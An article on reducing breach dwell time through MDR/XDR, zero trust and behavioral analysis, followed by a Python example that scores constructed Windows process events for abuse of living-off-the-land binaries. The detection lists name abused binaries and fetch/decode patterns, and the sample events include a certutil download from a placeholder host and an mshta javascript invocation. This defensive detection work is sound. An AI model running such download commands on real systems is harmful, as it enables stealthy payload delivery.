In today’s threat landscape, organizations must find effective ways to mitigate cyber risk from an underground economy whose annual income is measured in trillions of dollars. Businesses must improve their ability to detect and stop these threat actors, evicting them from their networks as swiftly as possible, or they risk irreversible reputational and financial harm.
The cybersecurity sector has a problem: global investment is increasing, yet the increase is not correlated with fewer breaches. In 2015, detecting a breach took an average of 206 days, and containing it took even longer. Five years later the situation had improved significantly: in 2020 the global median dwell time fell below 24 days for the first time.
Threat actors, however, still have 24 days in which to accomplish their goals. Organizations must become more efficient at catching and evicting them, bringing dwell time down to hours or minutes rather than days.
To accomplish this, more attention must be paid to the most typical sources of hidden malicious conduct within businesses.
Automated attacks based on commodity malware are still very common. However, many cybercriminal organizations have discovered that investing more in targeted threats and sophisticated tooling pays off. The recent emergence of ransomware gangs like REvil and Ryuk is a good example. They increasingly rely on ‘living off the land’ binaries (LOLBins), abusing legitimate Windows programs and processes to avoid detection by anti-malware tools.
Threat actors have another tool for acquiring that initial foothold: widespread remote working. The pandemic has hampered security efforts while also exposing new weaknesses that have been exploited quickly, such as distracted remote employees who click on links without thinking, or who share networks and devices with others who engage in risky conduct.
The adoption of vulnerable remote working infrastructure and team collaboration apps, as well as remote working tools and accounts without robust password protection, adds to the operational burden on security teams.
Malicious insiders have gained several incentives and opportunities as a result of the financial pressures of the pandemic and the difficulty of managing remote workers. According to the ‘2020 Cost of Insider Threats: Global Report’, such incidents can cost an organization over US$4 million per year and take an average of 77 days to resolve. Internal and external risks alike are exacerbated by inefficient off-boarding processes, over-privileged identities and poor password management.
A Three-Pronged Approach
IT security teams must have visibility, context, and control to be successful. However, even determining the extent of an organization’s current endpoint and cloud infrastructure, let alone safeguarding it, can be difficult. Here are a few approaches enterprises can adopt:
- An MDR/XDR Strategy – Address threat detection and response in isolated silos, and companies are likely to overlook something. For a full picture they need XDR, which correlates events from the cloud, network, and endpoint. MDR is also particularly valuable because it outsources all or part of the security operations role to a third-party specialist. Such a provider can deliver 24/7 threat detection and containment using solutions like XDR, giving the in-house security staff more time and attention to focus on strategic issues.
- Zero Trust – Another best practice that many businesses are adopting is zero trust, which can be summarized as “never trust, always verify.” Device profiling, risk-based multi-factor authentication (MFA), protective monitoring, network segmentation, and other features are among the foundational capabilities.
- Behavioral Analysis – It is no longer acceptable to rely exclusively on signatures and static rule-based techniques. To keep pace with the use of LOLBins and other covert approaches, such as lateral movement with stolen credentials, tooling must evolve. When reinforced with local business context, such as who the VIP users are and which devices are critical, behavioral analysis provides a much-improved method of threat detection and boosts the effectiveness of incident response operations.
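To make the difference between signature matching and context-aware behavioral analysis concrete, here is an added example that is not part of the article and not taken from any vendor product. It scores constructed endpoint process-creation events on behaviour (a LOLBin invoked with download or decode arguments, a scripting tool spawned by an Office application, a binary never before seen for that user) and then weights the score by business context (VIP users, key devices). The LOLBin list, the Office-parent list, the VIP and key-device sets, the weights, the threshold and every event are constructed assumptions for illustration; a real deployment would derive the baseline from its own telemetry and the context from its asset and identity inventories.

```python
"""Context-aware behavioral scoring of endpoint process events (added example).

All lists, weights, thresholds and events below are constructed for
illustration; none are taken from the article or from a real product.
"""
from collections import defaultdict
from dataclasses import dataclass, field

# Legitimate Windows binaries that are commonly abused to fetch, decode or run
# content without dropping custom malware (LOLBins). Their presence alone is
# not malicious; the surrounding behaviour decides. (Constructed subset.)
LOLBINS = {"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
           "wscript.exe", "bitsadmin.exe"}
# Office applications that should rarely spawn scripting or admin tools.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
# Command-line fragments that indicate a LOLBin is fetching or decoding content.
FETCH_OR_DECODE = ("http://", "https://", "-urlcache", "-decode", "javascript:")
# A signature-only tool knows a fixed list of bad file names (constructed).
KNOWN_BAD_IMAGES = {"mimikatz.exe"}

# Local business context (constructed): the people and hosts that matter most.
VIP_USERS = {"cfo"}
KEY_DEVICES = {"dc01", "fin-srv01"}


@dataclass
class ProcessEvent:
    ts: int          # monotonically increasing event time
    host: str
    user: str
    parent: str      # parent process image name
    image: str       # created process image name
    cmdline: str


def score_event(ev, seen):
    """Return (score, reasons). `seen` maps (user, image) -> number of earlier
    executions and acts as a minimal per-user behavioural baseline."""
    score, reasons = 0, []
    img, cl = ev.image.lower(), ev.cmdline.lower()
    if img in LOLBINS:
        score += 3; reasons.append("lolbin")
        if any(k in cl for k in FETCH_OR_DECODE):
            score += 3; reasons.append("lolbin-fetch-or-decode")
    if ev.parent.lower() in OFFICE_PARENTS and img in LOLBINS | {"powershell.exe", "cmd.exe"}:
        score += 4; reasons.append("office-spawn")
    if seen[(ev.user, img)] == 0:
        score += 1; reasons.append("first-seen-for-user")
    # Business context raises the priority; it never lowers it.
    mult = 1.0
    if ev.user in VIP_USERS:
        mult += 0.5; reasons.append("vip-user")
    if ev.host in KEY_DEVICES:
        mult += 1.0; reasons.append("key-device")
    return round(score * mult, 1), reasons


def triage(events, threshold=6.0):
    """Process events in time order, update the baseline, return alerts."""
    seen = defaultdict(int)
    alerts = []
    for ev in sorted(events, key=lambda e: e.ts):
        score, reasons = score_event(ev, seen)
        seen[(ev.user, ev.image.lower())] += 1
        if score >= threshold:
            alerts.append({"ts": ev.ts, "host": ev.host, "user": ev.user,
                           "image": ev.image, "score": score, "reasons": reasons})
    return alerts


def signature_only(events):
    """What a static name/signature match would flag on the same events."""
    return [ev for ev in events if ev.image.lower() in KNOWN_BAD_IMAGES]


# Constructed sample telemetry: one benign LOLBin use, one Office-spawned
# LOLBin on a workstation, one download via certutil on a key finance server
# by a VIP account, and a repeat of the benign event.
SAMPLE_EVENTS = [
    ProcessEvent(1, "wks-042", "alice", "explorer.exe", "rundll32.exe",
                 "rundll32.exe shell32.dll,Control_RunDLL"),
    ProcessEvent(2, "wks-042", "alice", "winword.exe", "mshta.exe",
                 "mshta.exe javascript:PLACEHOLDER"),
    ProcessEvent(3, "fin-srv01", "cfo", "cmd.exe", "certutil.exe",
                 "certutil -urlcache -f http://example.invalid/PLACEHOLDER"),
    ProcessEvent(4, "wks-042", "alice", "explorer.exe", "rundll32.exe",
                 "rundll32.exe shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    print("signature-only hits:", signature_only(SAMPLE_EVENTS))
    for a in triage(SAMPLE_EVENTS):
        print(a)
```

Run as a script, the signature-only pass flags nothing, because every binary involved is a legitimate Windows program, while the behavioral pass raises two alerts and ranks the certutil download on the finance server by the CFO account above the workstation event purely because of the context multiplier, which is the ordering an incident responder would want.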